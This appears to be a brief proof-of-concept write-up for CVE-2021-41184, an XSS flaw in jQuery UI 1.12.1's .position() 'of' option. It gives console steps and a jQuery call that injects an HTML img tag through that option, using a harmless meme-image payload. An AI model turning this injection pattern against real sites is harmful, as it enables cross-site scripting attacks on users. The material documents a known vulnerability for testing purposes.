Exploit Medium CVE-2021-41184 XSS in the of option of the .position() util
- jQuery ui version v1.12.1 vulnerable
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
------------------------------------------------Concept proof---------------------------------------------------------------
-
Open url
-
Open inspect
-
Look for some ID in site elements
3.1 #ID
-
Go to console tab
-
Inject script with ID selected at point 3.1
5.1 Script
$("#id").position( {
my: "center",
at: "right bottom",
of: "<img scr='https://media.makeameme.org/created/xss-xss-everywhere-5b8065.jpg' src='' />",
collision: "none"
});